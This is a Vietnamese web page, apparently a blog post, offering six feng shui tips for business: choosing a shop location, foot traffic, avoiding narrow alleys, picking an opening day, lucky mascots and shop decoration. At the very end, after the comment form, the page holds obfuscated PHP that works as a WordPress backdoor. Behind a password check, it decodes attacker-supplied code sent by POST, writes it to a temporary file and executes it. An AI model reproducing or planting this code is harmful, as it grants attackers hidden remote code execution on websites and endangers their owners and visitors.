6 mẹo phong thủy sẽ giúp bạn kinh doanh thuận lợi

Những người làm kinh doanh chú trọng nhất đến việc chọn địa điểm, ngày lành tháng tốt, điều này không chỉ liên quan đến tài lộc của bản thân mà còn liên quan đến việc làm ăn phát đạt. Trước khi mở cửa hàng, nhiều doanh nghiệp luôn hỏi thăm xem vị trí của mình có phải là vị trí đẹp không, có đủ lượng người qua lại không, có thuận tiện không. Bạn phải biết rằng có nhiều nơi kinh doanh không phổ biến, kinh doanh luôn thay đổi, ảnh hưởng đến chủ cửa hàng là rất lớn.

1. Lựa chọn địa điểm kinh doanh

Lựa chọn địa điểm kinh doanh

Khi chọn địa điểm cho cửa hàng, trước hết phải tránh tà khí. Địa điểm dù nổi tiếng đến đâu nhưng nếu không may mắn, cửa hàng vẫn sa sút. Khi chọn mặt bằng, cổng nên tránh những khu vực kiến ​​trúc không may mắn, chẳng hạn như nhà tang lễ, nghĩa trang, bệnh viện và những nơi có nhiều âm khí khác. Thứ hai là tránh những nơi có mùi hôi và biết rằng không ai muốn tồn tại trong một môi trường lộn xộn.

2. Chú ý đến dòng người và các doanh nghiệp xung quanh

Trên cùng một con phố, có nơi lượng người qua lại rất đông, dù bạn kinh doanh gì thì buôn bán cũng phát đạt, nhưng ở một số nơi, dù bạn mở cửa hàng gì thì độ phổ biến lại giảm sút. Có rất nhiều địa điểm như vậy nên khi chọn địa điểm phải tìm hiểu kỹ tình hình cửa hàng trước. Đồng thời, hãy chú ý đến các cơ sở kinh doanh xung quanh, nếu đều là nhà hàng mà bạn kinh doanh một cửa hàng bách hóa nhỏ thì rõ ràng sẽ có ảnh hưởng đến công việc kinh doanh và gây tổn thất lớn.

3. Tránh những khu vực hẹp

Dù bạn là ai đi chăng nữa thì bạn cũng không thích đi mua sắm ở góc phố ngõ ngách, trừ khi bạn là người kinh doanh rất nổi tiếng, thì nhất định sẽ có người tìm đến đây, như câu nói “Rượu thơm không lời, sợ những con hẻm sâu ”! Nhưng nếu bạn là một người chưa biết kinh doanh thì bạn phải khởi nghiệp như thế nào? Làm thế nào để mở rộng phạm vi kinh doanh?

4. Chọn ngày tốt để khai trương

Chọn ngày khai trương
Chọn ngày khai trương

Bạn cần chú ý khai trương cửa hàng là ngày nào rất quan trọng. Nói chung, các sách đã nói về những ngày nào thích hợp để mở cửa làm ăn. Khai trương vào những ngày tốt lành là điềm lành, cũng cầu mong việc làm ăn phát đạt, tài lộc dồi dào. Các ngày tốt để khai trương trong tháng là những ngày hoàng đạo, ngày hợp với mệnh của chủ hàng (nếu không biết thì có thể nhờ Thầy xem ngày) Xem thêm: Phong thủy trong ngày khai trương cửa hàng cần chú ý gì?

5. Đặt linh vật may mắn

Nhiều doanh nghiệp hiểu rằng đây thực sự là phương pháp đơn giản nhất trong Phong thủy. Nhiều bạn thích trưng mèo may mắn. Có hai cách nói về mèo may mắn, một cho rằng nó có nguồn gốc từ Trung Quốc hơn 1.000 năm trước, hai cho rằng nó có nguồn gốc từ Nhật Bản. Trên thực tế, ở Trung Quốc, đồ trang trí phong thủy được ưa chuộng nhất là Thần Tài và Tỳ Hưu, đây không chỉ là nét văn hóa được lưu truyền hàng nghìn năm của Trung Quốc mà còn có tác dụng chiêu tài rất mạnh, được rất nhiều người ưa chuộng giữa các thương gia. Xem thêm: 9 Vật phẩm phong thủy hút tài lộc

6. Trang trí cửa hàng phù hợp

Khi trang trí shop, bạn nên trang trí shop kết hợp với sản phẩm của chính mình. Chú ý đến việc phối hợp màu sắc và sử dụng hợp lý cửa hàng để không gây tốn diện tích, cũng như không khiến không gian có vẻ chật chội, lộn xộn. Bạn có thể thêm thiết kế của riêng mình, nhưng đừng quá lạc quan, bởi vì sự phân cực dễ xuất hiện, được những người tò mò yêu thích và những người bảo thủ sẽ tránh nó.

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *

0986.8484.65
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}